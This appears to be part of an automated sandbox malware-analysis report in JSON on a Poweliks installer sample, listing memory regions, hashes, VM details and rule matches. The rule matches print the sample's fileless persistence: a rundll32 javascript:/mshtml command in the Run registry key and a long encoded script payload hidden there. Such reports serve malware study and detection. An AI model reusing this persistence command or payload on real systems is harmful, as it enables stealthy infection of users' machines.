"c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1968570368, "timestamp": "00:01:32.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 786432, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1225", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:01:32.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1226", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:32.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1976172544, "type": "region", "version": 1 }, "end_va": 1989058559, "entry_point": 1976702465, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1227", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1976172544, "timestamp": "00:01:32.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1228", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:32.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 966655, "entry_point": 917504, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1229", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:01:32.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 72679424, "type": "region", "version": 1 }, "end_va": 72941567, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x0000000004550000", "norm_filename": null, "region_type": "private_memory", "start_va": 72679424, "timestamp": "00:01:32.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 73138176, "type": "region", "version": 1 }, "end_va": 73400319, "entry_point": 0, "filename": null, "id": "region_1231", "name": "private_0x00000000045c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 73138176, "timestamp": "00:01:32.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1232", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:32.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1015807, "entry_point": 983040, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1234", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:32.283", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 1048576, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1235", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1048576, "timestamp": "00:01:32.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1967325184, "type": "region", "version": 1 }, "end_va": 1967460351, "entry_point": 1967330398, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1236", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1967325184, "timestamp": "00:01:32.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1998606335, "entry_point": 1998328289, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1237", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:01:32.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1939210240, "type": "region", "version": 1 }, "end_va": 1939488767, "entry_point": 1939210240, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_1238", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1939210240, "timestamp": "00:01:32.368", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 9371647, "entry_point": 0, "filename": null, "id": "region_1243", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:32.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970913279, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_1244", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:32.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970733056, "type": "region", "version": 1 }, "end_va": 1970761727, "entry_point": 1970733056, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_1245", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970733056, "timestamp": "00:01:32.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1970470912, "type": "region", "version": 1 }, "end_va": 1970716671, "entry_point": 1970470912, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_1246", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1970470912, "timestamp": "00:01:32.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 73859072, "type": "region", "version": 1 }, "end_va": 75956223, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x0000000004670000", "norm_filename": null, "region_type": "private_memory", "start_va": 73859072, "timestamp": "00:01:32.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1968504832, "type": "region", "version": 1 }, "end_va": 1968525311, "entry_point": 1968504832, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_1248", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1968504832, "timestamp": "00:01:32.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1968439296, "type": "region", "version": 1 }, "end_va": 1968504831, "entry_point": 1968439296, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_1249", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1968439296, "timestamp": "00:01:32.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1769472, "start_va": 73859072, "type": "region", "version": 1 }, "end_va": 75628543, "entry_point": 0, "filename": null, "id": "region_1250", "name": "private_0x0000000004670000", "norm_filename": null, "region_type": "private_memory", "start_va": 73859072, "timestamp": "00:01:32.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 75694080, "type": "region", "version": 1 }, "end_va": 75956223, "entry_point": 0, "filename": null, "id": "region_1251", "name": "private_0x0000000004830000", "norm_filename": null, "region_type": "private_memory", "start_va": 75694080, "timestamp": "00:01:32.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_1252", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:32.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1968373760, "type": "region", "version": 1 }, "end_va": 1968439295, "entry_point": 1968373760, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_1253", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1968373760, "timestamp": "00:01:32.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1968242688, "type": "region", "version": 1 }, "end_va": 1968316415, "entry_point": 1968242688, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_1254", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1968242688, "timestamp": "00:01:32.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968209919, "entry_point": 1968177152, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_1255", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:01:32.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968144383, "entry_point": 1967915008, "filename": "\\Windows\\SysWOW64\\FWPUCLNT.DLL", "id": "region_1256", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\syswow64\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:32.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1638400, "start_va": 73859072, "type": "region", "version": 1 }, "end_va": 75497471, "entry_point": 0, "filename": null, "id": "region_1257", "name": "private_0x0000000004670000", "norm_filename": null, "region_type": "private_memory", "start_va": 73859072, "timestamp": "00:01:32.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75563008, "type": "region", "version": 1 }, "end_va": 75628543, "entry_point": 0, "filename": null, "id": "region_1258", "name": "private_0x0000000004810000", "norm_filename": null, "region_type": "private_memory", "start_va": 75563008, "timestamp": "00:01:32.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1967849472, "type": "region", "version": 1 }, "end_va": 1967874047, "entry_point": 1967849472, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_1259", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1967849472, "timestamp": "00:01:32.928", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "poweliks_installer.exe", "id": 17494, "md5_hash": "0181850239cd26b8fb8b72afb0e95eac", "sample_type": "windows_exe_(x86-32)", "sha1_hash": "bfa2dc3b9956a88a2e56bd6ab68d1f4f675a425a", "sha256_hash": "4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb", "size": 71680, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 48991, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_8904.png", "size": 41104, "thumbnail_archive_path": "screenshots/thumbnail_8904.png", "timestamp": "00:00:08.904", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_10153.png", "size": 63901, "thumbnail_archive_path": "screenshots/thumbnail_10153.png", "timestamp": "00:00:10.153", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_11957.png", "size": 44408, "thumbnail_archive_path": "screenshots/thumbnail_11957.png", "timestamp": "00:00:11.957", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_57044.png", "size": 47830, "thumbnail_archive_path": "screenshots/thumbnail_57044.png", "timestamp": "00:00:57.044", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_58049.png", "size": 4183, "thumbnail_archive_path": "screenshots/thumbnail_58049.png", "timestamp": "00:00:58.049", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_71522.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_71522.png", "timestamp": "00:01:11.522", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_72531.png", "size": 488648, "thumbnail_archive_path": "screenshots/thumbnail_72531.png", "timestamp": "00:01:12.531", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_78967.png", "size": 89371, "thumbnail_archive_path": "screenshots/thumbnail_78967.png", "timestamp": "00:01:18.967", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-08-21 12:23", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.75", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.450", "microsoft_excel_version": "not_installed", "microsoft_office_version": "not_installed", "microsoft_power_point_version": "not_installed", "microsoft_project_version": "not_installed", "microsoft_publisher_version": "not_installed", "microsoft_visio_version": "not_installed", "microsoft_word_version": "not_installed", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_dynamic_api_usage", "operation_desc": "Dynamic API usage", "ref_gfncalls": [ { "ref_id": "gfn_66", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_dynamic_api_usage_by_api", "technique_desc": "Resolve above average number of APIs.", "technique_path": "built_in._anti_analysis._dynamic_api_usage.vmray_dynamic_api_usage_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "178.89.159.34", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1613", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"178.89.159.34\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_1638", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_1639", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 61266 byte in \"HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_1639", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"#@~^kXcAAA==W!x^DkKxP^WTcV*\tODH\tax\t+h,)mDk\\\u007fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\t`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\tNc#p.\u007fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\u007fpr(Ln^D`J\tj1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\t\\rDGUs+UYUODbxLdvJ]Ar\tNrDuE*i2{h3J-'/HdhKh\u007fc'-Ar\tNWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\tnSP)1Yb\\+or(%+1YcJUm.raYk\tLRwkV\u007fjz/D+sr8Ln^DJbi6;x1YrG\tPm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\tnY,0.Cs+hG.0Pd+D;a-w\tNa--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\u007fY;DU~ZiN86;x1YrG\tPNc;*\ta'\tnSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\u007fRTE*iaRK2+\t`E!AKJS;B0CVkn*iac/\u007fxNv#p;0\t'CRA62C\tN2\t-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\u007f6Yor^+cE6UD~OME\u007f~O8#pr0vEWY*\t;WDR\u007fMrY\u007f`6c.n/aW\t/nAG[H#IE6OR;VGd\u007f`#I;6'WR;.\u007flO\u007fK\u007f6Ywk^n`!0U~DD;n*iE6O'6RM\u007fOok^+vEWxObpEW/{;0DR62\u007fxbdP\u007f6O?D.\u007flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\u007fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\u007fsrV\u007f`;W\t#i)Nh4kV\u007fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\t\\r.Kx:\u007fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\u007f6Y 3\tmGNbUTTl=bUZq&RVnYUY.k\toc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\u007f!T|wOpI(Bt(\u007f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\u007fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\u007f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\u007f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\t]2( qtm\u007f*;\"M.sC\u007flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\u007ft/\\\u007fHTm\u007f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\u007f8H*1&]V(?Xj\\\u007f}kt\u007fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\u007fVdtV.zpqHN}pgyoKW+j\t#En?X2\\\u007ft2(:.An\u007flt4qs%Kq,0N\t6sF;9B40qV(\u007f1z\u007fjF-t_.d}U(k9!\\t(C1^|UX2\\\u007ftw(:#i\u007f(A^FZx1+`]s4V.\t5pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\u007fsk}q}/5\u007fXymjHdI(1.J2wFNV194Vs.mzqd\t81Xm2]V(?XH9\u007f6TCq14m2]A}\tXV\\ sZ}jTw}X]j\u007f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\tw/::sD}Uaqm\u007f]V5xsPm\u007fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\ttV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\tjE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\tNst;q2rH]j\u007f($s5x.28VIsmbXA}\t\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\tsKm\u007f^d::.fiy6-N;aqlpx!9\u007fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\u007fqA(M.Otq*T5o]a4+lM(Ms\tmHLk`x#E9MsO\\?6ge\u007flt}y#Vqb3Fmh.T[o9;q;]j\u007f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\u007ftq(:1ZC\u007fOEqV[4+8A4mhsO(;t8jVoXI\u007fqs9M.zFwA-mysZl\tOEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\u007f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\u007f1EhK3d:\u007fs!tMw!42BXnUI`mU.sFj!L\u007f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\u007f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\u007f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\u007f*.e\u007f\\VKsoTlo}^K\t.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\u007fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\t\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\t#E9MsO\\?*B8\tIsms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\t1T(w1Xm2]V(?Xj9\u007f*TCqFsS0s!N!jX(&A:}oB m\u007fHV1XX(I\u007f*08Mj?}qeG|A*^NzFKesws52}oU\u007fXT`CIzFUhV.qX.5\t\\V::sZlotV:\u007f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\t#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\ttV1x]N}L2!1:,D}:wy}:eTj2IHl\t*UF;9\t\u007foty\\XO*( 